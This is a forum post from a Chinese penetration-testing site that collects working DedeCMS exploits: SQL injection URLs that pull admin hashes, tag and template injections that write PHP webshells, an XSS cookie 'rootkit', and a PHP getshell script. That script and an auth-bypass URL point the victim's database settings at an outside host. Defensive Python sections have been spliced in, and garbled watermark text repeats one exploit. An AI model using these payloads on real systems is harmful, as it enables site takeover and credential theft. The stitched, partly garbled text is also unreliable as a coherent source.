中国网络渗透测试联盟

Title: dedecms vulnerability summary [Print this page]

Author: admin    Time: 2012-10-18 10:42
Title: dedecms vulnerability summary

Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell written directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

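The GBK injection above works because a quote can survive escaping once the escaped bytes are read back as a multibyte charset. The following Python is an added example, not code from the post, showing the check a maintainer should make: byte-level escaping in the style of addslashes() leaves an unescaped quote when a lone lead byte absorbs the backslash, whereas decoding strictly first and escaping at the character level rejects the malformed input. The byte strings are constructed, and the demonstration uses the general GBK mechanism rather than the exact uid value from the post.

```python
from typing import Optional

def naive_addslashes(raw: bytes) -> bytes:
    """Byte-oriented escaping in the style of PHP addslashes(): a backslash is put
    in front of every quote or backslash byte, with no knowledge of the charset."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\":
            out.append(0x5C)      # the backslash byte
        out.append(b)
    return bytes(out)

def unescaped_quotes(fragment: str) -> int:
    """Count single quotes in a decoded string that are not preceded by a backslash,
    i.e. the quotes a SQL parser would treat as the end of a string literal.
    (An approximation: it does not track doubled backslashes.)"""
    return sum(1 for i, ch in enumerate(fragment)
               if ch == "'" and (i == 0 or fragment[i - 1] != "\\"))

def escape_after_decode(raw: bytes, charset: str) -> Optional[str]:
    """Charset-aware path: decode strictly first, so a lone lead byte is rejected
    instead of being paired with the escaping backslash, then escape at the
    character level. Returns None for input that is not valid in the charset."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'")

# Constructed inputs: a lone GBK lead byte followed by a quote (the wide-byte
# case), and an ordinary GBK string ending in a quote.
LONE_LEAD_BYTE = b"\xbf'"
NORMAL_GBK = "涛声依旧'".encode("gbk")

if __name__ == "__main__":
    # Naive path: 0xBF 0x5C becomes one two-byte character and the quote is bare.
    naive = naive_addslashes(LONE_LEAD_BYTE).decode("gbk")
    print("naive escaping leaves", unescaped_quotes(naive), "unescaped quote(s)")
    # Strict path: the malformed sequence is rejected before any SQL is built.
    print("strict decode result:", escape_after_decode(LONE_LEAD_BYTE, "gbk"))
```

The same lesson applies to the page's UTF-8 payloads: whatever the charset, escaping must happen on decoded characters with the connection charset known (or, better, values must go through bound parameters), never on raw bytes.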
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar intercept URL-type XSS, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; whichever of the URLs below you visit afterwards, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (Zhimeng) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp = Getshell($url, $aid, $path);
if (strpos($exp, "OK") > 12) {
    echo "Exploit Success \n";
    if ($aid == 1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "Exploit Failed \n";
}

function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = "80";
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "No response from ".$host."\n";
    }
    fwrite($ock, $data);
    while (!feof($ock)) {
        $exp = fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

The precondition for this vulnerability is that the backend path must be known first!

Dedecms (Zhimeng) tag remote file write vulnerability
Precondition: you must have your own dede database ready, and insert this row into it: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below, and the shell is 1.php in the same directory. Work out the principle yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

# Z0 q& Z  V& I+ m
# ?+ V4 y4 }3 x3 g# T% Y; Z
4 y8 s& L5 p/ ]+ l# b" O+ b
6 R- y  {+ i9 d* t! Q% M! P8 G' D1 v6 A
% Q$ E, Z( V% V8 h/ R

9 W0 v2 U1 Y( j0 ^0 C' G6 X" ]/ o% q4 Y8 Y

3 h, V* \, R8 X1 |/ N1 N# O9 b
$ {+ ~- C" g- G; x( v- oDedeCms v5.6 嵌入恶意代码执行漏洞
9 K! B3 X7 R! O& U& W: a+ i& R注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
: _9 \6 n5 C- k7 n$ @; A2 ra{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}, c% Q: J3 V. H9 d, g
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得# }" G6 Q( d+ U4 X  q% j% e
Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member management area, publish an article and upload an image, then in attachment management replace the image with a carefully constructed template; for example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2 Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(construct this here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have changed the template path. 3 Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

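Both the template execution write-up above ("if the image format is restricted, prepend gif89a") and this Get Shell entry depend on a file that begins with a GIF signature but carries a DedeCMS template body. The following Python is an added example, not code from the post or from DedeCMS, of the check a server-side upload handler should run before accepting such a file: it verifies the GIF signature, logical screen descriptor and trailer, and refuses image bodies that contain template or PHP markers. The sample inputs are constructed.

```python
from typing import List

# Markers that have no business inside an image body: the DedeCMS template
# syntax shown in the post, its runphp attribute, and a PHP open tag.
SUSPICIOUS_MARKERS = (b"{dede:", b"{/dede:", b"runphp", b"<?php")

def gif_upload_problems(data: bytes) -> List[str]:
    """Return every reason an uploaded 'GIF' should be rejected (empty list = accept).
    The check is structural rather than just 'first bytes': the signature is
    upper-case GIF87a/GIF89a per the spec, it must be followed by the 7-byte
    logical screen descriptor, and a complete file ends with the trailer 0x3B."""
    problems: List[str] = []
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        problems.append("signature is not GIF87a/GIF89a")
    else:
        if len(data) < 13:
            problems.append("no logical screen descriptor after the signature")
        if not data.endswith(b"\x3b"):
            problems.append("file does not end with the GIF trailer 0x3B")
    lowered = data.lower()
    for marker in SUSPICIOUS_MARKERS:
        if marker in lowered:
            problems.append(f"template/PHP marker {marker.decode()} inside image body")
    return problems

def accept_gif_upload(data: bytes) -> bool:
    """Policy wrapper: accept only when no problem was found."""
    return not gif_upload_problems(data)

# Constructed samples: the polyglot shape from the post (note the lower-case
# 'Gif', which is not a valid signature), and a minimal structurally valid GIF
# (signature + 1x1 logical screen descriptor + trailer).
POLYGLOT = b"Gif89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}"
MINIMAL_GIF = b"GIF89a\x01\x00\x01\x00\x00\x00\x00\x3b"

if __name__ == "__main__":
    for name, blob in (("polyglot", POLYGLOT), ("minimal gif", MINIMAL_GIF)):
        print(name, "->", gif_upload_problems(blob) or "accepted")
```

This is a cheap first gate, not a full decoder: a production handler should additionally re-encode the image with an image library so that any trailing template text is discarded, and should never let a member-supplied path reach the templet field at all.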
Zhimeng (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

Zhimeng (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

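The edit_face.php deletion and the carbuyaction.php include above both hand a user-controlled relative path to the filesystem. The following Python is an added example, not the project's code, of a containment check: the path is normalised and accepted only if it stays strictly inside the directory the handler is allowed to touch. The web root, the per-member uploads/userup/<uid> layout and the include/payment directory for the code parameter are assumptions for the illustration; the post does not show where code is used.

```python
import posixpath
from typing import Optional

def contain_path(web_root: str, allowed_subdir: str, user_path: str) -> Optional[str]:
    """Resolve user_path relative to web_root and return the absolute path only if
    it lies strictly inside web_root/allowed_subdir; otherwise return None.
    posixpath is used so the result is identical on every platform."""
    if "\x00" in user_path:            # a NUL byte would truncate the path in C-level calls
        return None
    allowed = posixpath.normpath(posixpath.join(web_root, allowed_subdir))
    candidate = posixpath.normpath(posixpath.join(web_root, user_path.lstrip("/")))
    if candidate == allowed:           # the directory itself is never a valid target
        return None
    if posixpath.commonpath([allowed, candidate]) != allowed:
        return None                    # '..' segments escaped the allowed directory
    return candidate

def safe_delete_target(web_root: str, user_id: int, oldface: str) -> Optional[str]:
    """edit_face.php case: a member may only delete files under their own
    uploads/userup/<uid> directory (assumed layout)."""
    return contain_path(web_root, f"uploads/userup/{user_id}", oldface)

def safe_payment_module(web_root: str, code: str) -> Optional[str]:
    """carbuyaction.php case: the payment module name must be a bare identifier
    and resolve to a .php file inside include/payment (assumed layout)."""
    if not code.isalnum():
        return None
    return contain_path(web_root, "include/payment", f"include/payment/{code}.php")

if __name__ == "__main__":
    root = "/var/www/dede"             # assumed deployment path
    print(safe_delete_target(root, 8, "/uploads/userup/8/face.jpg"))
    print(safe_delete_target(root, 8, "/uploads/userup/8/../../../member/templets/images/m_logo.gif"))
    print(safe_payment_module(root, "../../"))
```

Checking the prefix on the normalised absolute path, rather than searching the raw string for "..", is what makes the check robust to encodings such as "/uploads/userup/8/./../x" or a leading slash; the allow-list of a single directory per member is the least-privilege counterpart.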
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 value; from that, drop 3 from the front and 1 from the end to get the 16-character MD5.

Zhimeng (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Zhimeng (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Zhimeng (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This uses a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is visible.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the action address in its form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the information from step 2 means the trojan file upload succeeded.

Zhimeng (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
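Most entries in this post are GET requests with recognisable shapes: superglobal-override keys such as _POST[GLOBALS][...] or cfg_*, DedeCMS template tags in parameter values, script tags in gotopage, ../ in file parameters, raw SQL in sql= and union payloads, and a PHP close tag in mid=. The following Python is an added example, not code from the post, of a scanner that applies those checks to access-log lines. The log lines are constructed with documentation-range client addresses; POST bodies (the mytag_js.php and select_soft_post.php cases) never appear in an access log, so the scanner can only flag the anomalous POST to plus/mytag_js.php itself, and the rest of that detection belongs in a WAF or application log.

```python
import re
import urllib.parse
from typing import Callable, List, Set, Tuple

# Combined/common log format: ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule inspects one decoded (key, value) pair of the query string.
RULES: List[Tuple[str, Callable[[str, str], bool]]] = [
    # keys that try to overwrite PHP superglobals or DedeCMS cfg_* settings
    ("global_override",
     lambda k, v: re.match(r'(?i)(_(GET|POST|COOKIE|REQUEST|SERVER)\[|GLOBALS\b|cfg_)', k) is not None),
    # DedeCMS template tags or runphp inside a value
    ("template_tag", lambda k, v: "{dede:" in v.lower() or "runphp" in v.lower()),
    # script injection, e.g. the gotopage XSS
    ("script_injection", lambda k, v: "<script" in v.lower() or "javascript:" in v.lower()),
    # directory traversal in file-like parameters (oldface, code, templet)
    ("path_traversal", lambda k, v: "../" in v or "..\\" in v),
    # raw SQL handed to the application (advancedsearch sql=, union/updatexml payloads)
    ("raw_sql",
     lambda k, v: re.search(r'(?i)\b(select|union)\b.*\bfrom\b|updatexml\s*\(', v) is not None),
    # PHP close tag or eval() smuggled into a numeric parameter (digg_frame mid=)
    ("php_code", lambda k, v: "?>" in v or "eval(" in v.lower()),
]

def parse_target(target: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split the request target into its path and decoded (key, value) pairs."""
    url = urllib.parse.urlsplit(target)
    return url.path, urllib.parse.parse_qsl(url.query, keep_blank_values=True)

def classify(method: str, path: str, params: List[Tuple[str, str]]) -> Set[str]:
    """Return the set of rule names that fire for one request."""
    tags: Set[str] = set()
    for key, value in params:
        for name, predicate in RULES:
            if predicate(key, value):
                tags.add(name)
    # mytag_js.php is normally fetched by a <script src> GET; a POST to it is the
    # shape of the variable-overwrite exploit, whose body the access log never shows.
    if method == "POST" and path.endswith("/plus/mytag_js.php"):
        tags.add("post_to_mytag_js")
    return tags

def scan_access_log(text: str) -> List[Tuple[int, str, Set[str]]]:
    """Return (line number, client ip, tags) for every line that matches a rule."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        path, params = parse_target(m.group("target"))
        tags = classify(m.group("method"), path, params)
        if tags:
            hits.append((lineno, m.group("ip"), tags))
    return hits

# Constructed sample log: one benign request followed by request shapes that
# mirror the entries in this post, from documentation-range addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:01 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Oct/2012:10:42:02 +0800] "GET /dede/login.php?dopost=login&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=198.51.100.9 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Oct/2012:10:42:03 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.8 - - [18/Oct/2012:10:42:04 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 120 "-" "curl/7.26"
203.0.113.8 - - [18/Oct/2012:10:42:05 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 900 "-" "curl/7.26"
203.0.113.9 - - [18/Oct/2012:10:42:06 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for lineno, ip, tags in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {', '.join(sorted(tags))}")
```

The rules are deliberately broad (any cfg_-prefixed key, any ../), so they are a triage filter for a 2012-era DedeCMS install rather than a blocking signature; a hit on global_override or post_to_mytag_js against a host that still has register_globals-style variable import is the one to escalate first.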





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2